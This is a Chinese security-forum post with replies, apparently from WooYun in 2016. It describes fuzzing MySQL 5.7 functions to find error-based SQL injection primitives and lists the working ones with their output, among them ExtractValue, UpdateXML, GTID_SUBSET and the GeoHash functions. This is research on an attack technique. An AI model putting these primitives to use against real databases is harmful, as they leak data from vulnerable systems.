Mysql报错注入简单测试模型 20160416

测试Mysql环境:Mysql 5.7.12-log Mysql Community Server(GPL)

①收集内置函数
http://dev.mysql.com/doc/refman/5.7/en/dynindex-function.html
②整理列表
select ABS();
select ACOS();
select add();
select ADDDATE();
select addslashes();
select ADDTIME();
select AES_DECRYPT();
select AES_ENCRYPT();
select ANY_VALUE();
select Area();
select AsBinary();
select ASCII();
select ASIN();
select AsText();
select AsWKB();
select AsWKT();
select ASYMMETRIC_DECRYPT();
select ASYMMETRIC_DERIVE();
select ASYMMETRIC_ENCRYPT();
select ASYMMETRIC_SIGN();
select ASYMMETRIC_VERIFY();
select ATAN();
select ATAN2();
select AVG();
select BENCHMARK();
select BIN();
select BIT_AND();
select BIT_COUNT();
select BIT_LENGTH();
select BIT_OR();
select BIT_XOR();
select Buffer();
select CAST();
select CEIL();
select CEILING();
select Centroid();
select CHAR();
select CHAR_LENGTH();
select CHARACTER_LENGTH();
select CHARSET();
select E();
select COERCIBILITY();
select COLLATION();
select COMPRESS();
select CONCAT();
select CONCAT_WS();
select CONNECTION_ID();
select Contains();
select CONV();
select CONVERT();
select CONVERT_TZ();
select ConvexHull();
select COS();
select COT();
select COUNT();
select CRC32();
select CREATE_ASYMMETRIC_PRIV_KEY();
select CREATE_ASYMMETRIC_PUB_KEY();
select CREATE_DH_PARAMETERS();
select CREATE_DIGEST();
select Crosses();
select crypt();
select CURDATE();
select CURRENT_DATE();
select CURRENT_TIME();
select CURRENT_TIMESTAMP();
select CURRENT_USER();
select CURTIME();
select DATABASE();
select DATE();
select DATE_ADD();
select DATE_FORMAT();
select DATE_SUB();
select DATEDIFF();
select DAY();
select DAYNAME();
select DAYOFMONTH();
select DAYOFWEEK();
select DAYOFYEAR();
select DECODE();
select decr();
select DEFAULT();
select DEGREES();
select delete();
select DES_DECRYPT();
select DES_ENCRYPT();
select Dimension();
select Disjoint();
select Distance();
select ELT();
select ENCODE();
select ENCRYPT();
select EndPoint();
select Envelope();
select Equals();
select EXP();
select EXPORT_SET();
select expr IN ();
select expr NOT IN ();
select ExteriorRing();
select EXTRACT();
select ExtractValue();
select FIELD();
select FIND_IN_SET();
select FLOOR();
select FORMAT();
select FOUND_ROWS();
select FROM_BASE64();
select FROM_DAYS();
select FROM_UNIXTIME();
select GeomCollFromText();
select GeomCollFromWKB();
select GeometryCollection();
select GeometryCollectionFromText();
select GeometryCollectionFromWKB();
select GeometryFromText();
select GeometryFromWKB();
select GeometryN();
select GeometryType();
select GeomFromText();
select GeomFromWKB();
select get();
select GET_FORMAT();
select GET_LOCK();
select gethostbyaddr();
select gethostbyaddr_r();
select gethostbyname();
select gethostbyname_r();
select getrusage();
select gettimeofday();
select GLength();
select GREATEST();
select GROUP_CONCAT();
select GTID_SUBSET();
select GTID_SUBTRACT();
select HEX();
select HOUR();
select IF();
select IFNULL();
select IN();
select incr();
select INET6_ATON();
select INET6_NTOA();
select INET_ATON();
select INET_NTOA();
select INSERT();
select INSTR();
select InteriorRingN();
select Intersects();
select INTERVAL();
select IS_FREE_LOCK();
select IS_IPV4();
select IS_IPV4_COMPAT();
select IS_IPV4_MAPPED();
select IS_IPV6();
select IS_USED_LOCK();
select IsClosed();
select IsEmpty();
select ISNULL();
select IsSimple();
select JSON_APPEND();
select JSON_ARRAY();
select JSON_ARRAY_APPEND();
select JSON_ARRAY_INSERT();
select JSON_CONTAINS();
select JSON_CONTAINS_PATH();
select JSON_DEPTH();
select JSON_EXTRACT();
select JSON_INSERT();
select JSON_KEYS();
select JSON_LENGTH();
select JSON_MERGE();
select JSON_OBJECT();
select JSON_QUOTE();
select JSON_REMOVE();
select JSON_REPLACE();
select JSON_SEARCH();
select JSON_SET();
select JSON_TYPE();
select JSON_UNQUOTE();
select JSON_VALID();
select LAST_DAY();
select LAST_INSERT_ID();
select LCASE();
select LEAST();
select LEFT();
select LENGTH();
select Length();
select LineFromText();
select LineFromWKB();
select LineString();
select LineStringFromText();
select LineStringFromWKB();
select LN();
select LOAD_FILE();
select LOCALTIME();
select LOCALTIMESTAMP();
select LOCATE();
select LOG();
select LOG10();
select LOG2();
select LOWER();
select LPAD();
select LTRIM();
select MAKE_SET();
select MAKEDATE();
select MAKETIME();
select MASTER_POS_WAIT();
select MATCH();
select MAX();
select MBRContains();
select MBRCoveredBy();
select MBRCovers();
select MBRDisjoint();
select MBREqual();
select MBREquals();
select MBRIntersects();
select MBROverlaps();
select MBRTouches();
select MBRWithin();
select MD5();
select MICROSECOND();
select MID();
select MIN();
select MINUTE();
select MLineFromText();
select MLineFromWKB();
select MOD();
select MONTH();
select MONTHNAME();
select MPointFromText();
select MPointFromWKB();
select MPolyFromText();
select MPolyFromWKB();
select MultiLineString();
select MultiLineStringFromText();
select MultiLineStringFromWKB();
select MultiPoint();
select MultiPointFromText();
select MultiPointFromWKB();
select MultiPolygon();
select MultiPolygonFromText();
select MultiPolygonFromWKB();
select my_open();
select NAME_CONST();
select NOT IN();
select NOW();
select NULLIF();
select NumGeometries();
select NumInteriorRings();
select NumPoints();
select OCT();
select OCTET_LENGTH();
select OLD_PASSWORD();
select ORD();
select Overlaps();
select PASSWORD();
select PERIOD_ADD();
select PERIOD_DIFF();
select PI();
select Point();
select PointFromText();
select PointFromWKB();
select PointN();
select PolyFromText();
select PolyFromWKB();
select Polygon();
select PolygonFromText();
select PolygonFromWKB();
select POSITION();
select POW();
select POWER();
select pthread_mutex();
select QUARTER();
select QUOTE();
select RADIANS();
select RAND();
select RANDOM_BYTES();
select RELEASE_ALL_LOCKS();
select RELEASE_LOCK();
select REPEAT();
select REPLACE();
select replace();
select REVERSE();
select RIGHT();
select ROUND();
select ROW_COUNT();
select RPAD();
select RTRIM();
select SCHEMA();
select SEC_TO_TIME();
select SECOND();
select SESSION_USER();
select set();
select setrlimit();
select SHA();
select SHA1();
select SHA2();
select SIGN();
select SIN();
select SLEEP();
select SOUNDEX();
select SPACE();
select SQRT();
select SRID();
select ST_Area();
select ST_AsBinary();
select ST_AsGeoJSON();
select ST_AsText();
select ST_AsWKB();
select ST_AsWKT();
select ST_Buffer();
select ST_Buffer_Strategy();
select ST_Centroid();
select ST_Contains();
select ST_ConvexHull();
select ST_Crosses();
select ST_Difference();
select ST_Dimension();
select ST_Disjoint();
select ST_Distance();
select ST_Distance_Sphere();
select ST_EndPoint();
select ST_Envelope();
select ST_Equals();
select ST_ExteriorRing();
select ST_GeoHash();
select ST_GeomCollFromText();
select ST_GeomCollFromTxt();
select ST_GeomCollFromWKB();
select ST_GeometryCollectionFromText();
select ST_GeometryCollectionFromWKB();
select ST_GeometryFromText();
select ST_GeometryFromWKB();
select ST_GeometryN();
select ST_GeometryType();
select ST_GeomFromGeoJSON();
select ST_GeomFromText();
select ST_GeomFromWKB();
select ST_InteriorRingN();
select ST_Intersection();
select ST_Intersects();
select ST_IsClosed();
select ST_IsEmpty();
select ST_IsSimple();
select ST_IsValid();
select ST_LatFromGeoHash();
select ST_Length();
select ST_LineFromText();
select ST_LineFromWKB();
select ST_LineStringFromText();
select ST_LineStringFromWKB();
select ST_LongFromGeoHash();
select ST_MakeEnvelope();
select ST_MLineFromText();
select ST_MLineFromWKB();
select ST_MPointFromText();
ST_MPointFromWKB();
select ST_MPolyFromText();
select ST_MPolyFromWKB();
select ST_MultiLineStringFromText();
select ST_MultiLineStringFromWKB();
select ST_MultiPointFromText();
select ST_MultiPointFromWKB();
select ST_MultiPolygonFromText();
select ST_MultiPolygonFromWKB();
select ST_NumGeometries();
select ST_NumInteriorRing();
select ST_NumInteriorRings();
select ST_NumPoints();
select ST_Overlaps();
select ST_PointFromGeoHash();
select ST_PointFromText();
select ST_PointFromWKB();
select ST_PointN();
select ST_PolyFromText();
select ST_PolyFromWKB();
select ST_PolygonFromText();
select ST_PolygonFromWKB();
select ST_Simplify();
select ST_SRID();
select ST_StartPoint();
select ST_SymDifference();
select ST_Touches();
select ST_Union();
select ST_Validate();
select ST_Within();
select ST_X();
select ST_Y();
select StartPoint();
select STD();
select STDDEV();
select STDDEV_POP();
select STDDEV_SAMP();
select STR_TO_DATE();
select STRCMP();
select SUBDATE();
select SUBSTR();
select SUBSTRING();
select SUBSTRING_INDEX();
select SUBTIME();
select SUM();
select SYSDATE();
select SYSTEM_USER();
select TAN();
select TIME();
select TIME_FORMAT();
select TIME_TO_SEC();
select TIMEDIFF();
select TIMESTAMP();
select TIMESTAMPADD();
select TIMESTAMPDIFF();
select TO_BASE64();
select TO_DAYS();
select TO_SECONDS();
select Touches();
select TRIM();
select TRUNCATE();
select UCASE();
select UNCOMPRESS();
select UNCOMPRESSED_LENGTH();
select UNHEX();
select UNIX_TIMESTAMP();
select UpdateXML();
select UPPER();
select USER();
select UTC_DATE();
select UTC_TIME();
select UTC_TIMESTAMP();
select UUID();
select UUID_SHORT();
select VALIDATE_PASSWORD_STRENGTH();
select VALUES();
select VAR_POP();
select VAR_SAMP();
select VARIANCE();
select VERSION();
select WAIT_FOR_EXECUTED_GTID_SET();
select WAIT_UNTIL_SQL_THREAD_AFTER_GTIDS();
select WEEK();
select WEEKDAY();
select WEEKOFYEAR();
select WEIGHT_STRING();
select Within();
select X();
select Y();
select YEAR();
select YEARWEEK();

③构造测试模型
select functionname(version());
select functionname(1,version());
select functionname(version(),1);
select functionname(version(),1,1);
select functionname(1,version(),1);
select functionname(version(),1,1);

④在mysql command line设置log输出位置
tee Y:/sqllog.txt
⑤将3中的模型通过replace的方式放到2中列表里,直接将结果粘贴到command line里。
由于列表中包含换行字符sql语句将会依次执行。
⑥以-log为关键字通过log文件整理有效的报错注入结果:
mysql> select ST_LatFromGeoHash(version());
ERROR 1411 (HY000): Incorrect geohash value: '5.7.12-log' for function ST_LATFROMGEOHASH
mysql> select ST_LongFromGeoHash(version());
ERROR 1411 (HY000): Incorrect geohash value: '5.7.12-log' for function ST_LONGFROMGEOHASH
mysql> select ExtractValue(1,version());
ERROR 1105 (HY000): XPATH syntax error: '.12-log'
mysql> select GTID_SUBSET(version(),1);
ERROR 1772 (HY000): Malformed GTID set specification '5.7.12-log'.
mysql> select GTID_SUBTRACT(version(),1);
ERROR 1772 (HY000): Malformed GTID set specification '5.7.12-log'.
mysql> select ST_PointFromGeoHash(version(),1);
ERROR 1411 (HY000): Incorrect geohash value: '5.7.12-log' for function st_pointfromgeohash
mysql> select UpdateXML(1,version(),1);
ERROR 1105 (HY000): XPATH syntax error: '.12-log'


感觉还不错。回头慢慢加大测试pattern看能不能得到更多有趣的结果。

收藏 感谢(2)
分享到: 0
22 个回复
  1. 1# Cyrils (')(') | 2016-04-16 13:23

    nice~

  2. 2# 小牛牛 | 2016-04-16 13:30

    给楼主赞一个,很不错哈

  3. 3# 坏男孩-A_A | 2016-04-16 13:30

    可以的,学习了

  4. 4# RedFree (‮11:11 11-11-1112 |※(器杀制自) | 2016-04-16 14:19

    漂亮!

  5. 5# Mazing (嘿,一起学习吗) | 2016-04-16 14:59

    好啊好

  6. 6# Azui | 2016-04-16 19:45

    好恐怖..好帅气

  7. 7# 脚本菜菜 | 2016-04-16 19:49

    make

  8. 8# 风之传说 | 2016-04-16 22:49

    给楼主思路赞一个。

  9. 9# 1c3z (你不是一个人在战斗) | 2016-04-16 23:09

    学习。

  10. 10# todaro (学习装逼) | 2016-04-16 23:28

    漂亮!

  11. 11# 书生 (WooYun(白帽子技术社区)) | 2016-04-16 23:51

    M锅没受到地震波及吧

  12. 12# mramydnei (一个逗逼运维) | 2016-04-17 00:30

    @书生 熊本据说确定了35名死亡者。不过我这儿没事

  13. 13# 迦南 (我不是玩黑,我就是认真) | 2016-04-17 08:48

    火钳刘明

  14. 14# todaro (学习装逼) | 2016-04-17 13:47

    这些函数今天再一看,好像之前有人已经测试过了,不知道有没有记错。

  15. 15# jjboom | 2016-04-18 14:26

    mysql> select ST_LatFromGeoHash(version());
    ERROR 1305 (42000): FUNCTION ST_LatFromGeoHash does not exist
    mysql> select ST_LongFromGeoHash(version());
    ERROR 1305 (42000): FUNCTION ST_LongFromGeoHash does not exist
    mysql> select ST_PointFromGeoHash(version(),1);
    ERROR 1305 (42000): FUNCTION ST_PointFromGeoHash does not exist

    赞~。有些函数mysql 5.6.22并没有。

  16. 16# P0ker_L | 2016-04-18 15:52

    为啥是以-log为关键字?

  17. 17# ppt (小伙子,你0day掉了) | 2016-04-18 15:56

  18. 18# jeary ((:‮?办么怎,了多越来越法方象抽的我)) | 2016-04-18 17:08

    fuzz大法.

  19. 19# r3d0x8 (' and '1'='2'') | 2016-04-18 22:58

    好方法!

  20. 20# 小红猪 (你以为是我来挖洞的?其实我是来找媳妇的,啊哈哈哈~) | 2016-04-19 09:16

  21. 21# PiaCa (ﻬ10wb 求把 PiaCa 改成 piaca) | 2016-04-19 10:45

    @P0ker_L 版本号里面包含这个

  22. 22#
    回复此人 感谢
    hack2012 (www.waitalone.cn) | 2016-04-19 17:11

    这个很不错。。。这个要记录一下。

你可能感兴趣的:(Mysql报错注入简单测试模型 20160416)